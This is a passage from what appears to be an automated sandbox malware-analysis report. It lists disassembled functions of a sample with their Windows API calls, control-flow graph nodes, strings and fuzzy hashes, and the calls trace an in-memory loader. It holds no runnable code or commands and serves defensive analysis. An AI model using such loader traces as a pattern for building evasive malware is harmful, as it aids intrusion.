                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5
                                                                                                                                                                                                                                            Function 0043A9B0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 326 43a9b0-43a9e2 LdrInitializeThunk
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                            Function 0043CD60 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID: ihgf
                                                                                                                                                                                                                                            • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                            • Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                            • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                                                                                                                                            Function 0043B05B Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                            • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD
                                                                                                                                                                                                                                            Function 0040BDC9 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                            • Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A
                                                                                                                                                                                                                                            Function 0249003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 0 249003c-2490047 1 2490049 0->1 2 249004c-2490263 call 2490a3f call 2490e0f call 2490d90 VirtualAlloc 0->2 1->2 17 249028b-2490292 2->17 18 2490265-2490289 call 2490a69 2->18 20 24902a1-24902b0 17->20 22 24902ce-24903c2 VirtualProtect call 2490cce call 2490ce7 18->22 20->22 23 24902b2-24902cc 20->23 29 24903d1-24903e0 22->29 23->20 30 2490439-24904b8 VirtualFree 29->30 31 24903e2-2490437 call 2490ce7 29->31 32 24904be-24904cd 30->32 33 24905f4-24905fe 30->33 31->29 35 24904d3-24904dd 32->35 36 249077f-2490789 33->36 37 2490604-249060d 33->37 35->33 42 24904e3-2490505 LoadLibraryA 35->42 40 249078b-24907a3 36->40 41 24907a6-24907b0 36->41 37->36 43 2490613-2490637 37->43 40->41 44 249086e-24908be LoadLibraryA 41->44 45 24907b6-24907cb 41->45 46 2490517-2490520 42->46 47 2490507-2490515 42->47 48 249063e-2490648 43->48 52 24908c7-24908f9 44->52 49 24907d2-24907d5 45->49 50 2490526-2490547 46->50 47->50 48->36 51 249064e-249065a 48->51 53 2490824-2490833 49->53 54 24907d7-24907e0 49->54 55 249054d-2490550 50->55 51->36 56 2490660-249066a 51->56 57 24908fb-2490901 52->57 58 2490902-249091d 52->58 64 2490839-249083c 53->64 59 24907e2 54->59 60 24907e4-2490822 54->60 61 24905e0-24905ef 55->61 62 2490556-249056b 55->62 63 249067a-2490689 56->63 57->58 59->53 60->49 61->35 65 249056d 62->65 66 249056f-249057a 62->66 67 249068f-24906b2 63->67 68 2490750-249077a 63->68 64->44 69 249083e-2490847 64->69 65->61 71 249059b-24905bb 66->71 72 249057c-2490599 66->72 73 24906ef-24906fc 67->73 74 24906b4-24906ed 67->74 68->48 75 2490849 69->75 76 249084b-249086c 69->76 83 24905bd-24905db 71->83 72->83 77 249074b 73->77 78 24906fe-2490748 73->78 74->73 75->44 76->64 77->63 78->77 83->55
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0249024D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                            • Instruction ID: 399dcb6eb3918c0fda0455d7dbc85658349493339161d9849fa38a55beedf806
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2525874A01229DFDB64CF58C984BA9BBB1BF09314F1480DAE94DAB351DB30AE95CF14
                                                                                                                                                                                                                                            Function 0043AB0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 123 43ab0b-43ab1f 124 43ab20-43ab7b 123->124 124->124 125 43ab7d-43abce GetForegroundWindow call 43c7d0 124->125
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ForegroundWindow
                                                                                                                                                                                                                                            • String ID: ilmn
                                                                                                                                                                                                                                            • API String ID: 2020703349-1560153188
                                                                                                                                                                                                                                            • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                            • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286
                                                                                                                                                                                                                                            Function 008F915E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 129 8f915e-8f9177 130 8f9179-8f917b 129->130 131 8f917d 130->131 132 8f9182-8f918e CreateToolhelp32Snapshot 130->132 131->132 133 8f919e-8f91ab Module32First 132->133 134 8f9190-8f9196 132->134 135 8f91ad-8f91ae call 8f8e1d 133->135 136 8f91b4-8f91bc 133->136 134->133 139 8f9198-8f919c 134->139 140 8f91b3 135->140 139->130 139->133 140->136
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008F9186
                                                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 008F91A6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759184300.00000000008F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008F8000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_8f8000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3833638111-0
                                                                                                                                                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                            • Instruction ID: 65bbabaa9c758668528bb7ba6b3224d7fdb95344ad48145c67d289bccf4ac8d6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40F0623520071A6BD7202AB9A88DB7F76E8FF49725F100538E782D10C0DA74EC858A61
                                                                                                                                                                                                                                            Function 02490E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 142 2490e0f-2490e24 SetErrorMode * 2 143 2490e2b-2490e2c 142->143 144 2490e26 142->144 144->143
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02490223,?,?), ref: 02490E19
                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02490223,?,?), ref: 02490E1E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                            • Instruction ID: 222b95ba1efed397dc51e845e48fe434b558f4b478ecd050a5280b6dec76a593
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20D0123514512877DB002A94DC09BCE7F1CDF05B66F008011FB0DD9180C770954046E5
                                                                                                                                                                                                                                            Function 0043AB91 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 322 43ab91-43aba8 GetForegroundWindow call 43c7d0 325 43abad-43abce 322->325
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ForegroundWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2020703349-0
                                                                                                                                                                                                                                            • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                            • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49
                                                                                                                                                                                                                                            Function 00438E70 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 327 438e70-438e7c 328 438e83-438e8e call 43bf00 RtlFreeHeap 327->328 329 438e94-438e95 327->329 328->329
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                                            • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                            • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8
                                                                                                                                                                                                                                            Function 00438E47 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 332 438e47-438e4a 333 438e51-438e55 RtlAllocateHeap 332->333
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                            • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                            • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                                                                                                                                            Function 00438E51 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                            • Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                            • Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
                                                                                                                                                                                                                                            Function 008F8E1D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008F8E6E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759184300.00000000008F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008F8000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_8f8000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                            • Instruction ID: 5ecbfff04eb4a50b10df7296c1ac593d663f9e0bd6ab1ad89245364951c45574
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A113F79A00208EFDB01DF98C985E99BBF5EF08750F058094FA489B362D771EA50DF80

                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                            Function 004361E0 Relevance: 32.1, APIs: 10, Strings: 8, Instructions: 636memorycomCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                                                                                                                                                                                                            • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00436613
                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00436775
                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                            • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                            • API String ID: 2485776651-4124187736
                                                                                                                                                                                                                                            • Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                            • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                            Function 00423A34 Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                            • API String ID: 0-2246970021
                                                                                                                                                                                                                                            • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                            • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                                                                                                                                            Function 024B3C9B Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                            • API String ID: 0-2246970021
                                                                                                                                                                                                                                            • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                            • Instruction ID: 57884115f73a545973cdd85e813ae28e768ac0b03b9150b708654ebc8ab184ab
